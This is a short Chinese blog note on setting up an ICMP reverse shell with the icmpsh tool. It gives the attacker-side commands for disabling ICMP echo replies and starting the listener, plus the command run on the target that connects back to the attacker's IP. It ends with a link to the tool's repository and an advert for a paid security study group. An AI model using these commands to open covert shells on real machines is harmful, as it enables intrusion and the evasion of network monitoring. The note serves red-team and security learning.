ICMP shell

 


场景

反向shell的场景下使用

原理

ICMP作为获取反向shell的通道

实践

运行 run.sh报错,可能是因为用的Parrot。改一下就可以了

ifconfig  | grep 'inet '| grep -v '127.0.0.1' | awk '{ print $2}'

或者直接运行主要命令。

攻击者机器运行:

sysctl -w net.ipv4.icmp_echo_ignore_all=1 >/dev/null

python icmpsh_m.py 攻击机ip 目标机ip

目标机运行:

icmpsh.exe -t 攻击机ip -d 500 -b 30 -s 128

代码

VS2013编译通过icmpsh-s.c

https://github.com/inquisb/icmpsh

效果



===========================================================

一个独立安全研究员,自由职业者的知识星球《公鸡队之家》,一边研究技术,一边分享到星球,一边养活自己,我们都有一颗好为人师的心,赠人玫瑰,手留余香。星球的价格是199¥/年。希望大家赏光,加入二维码在文末。

知识星球
posted @   17bdw  阅读(557)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示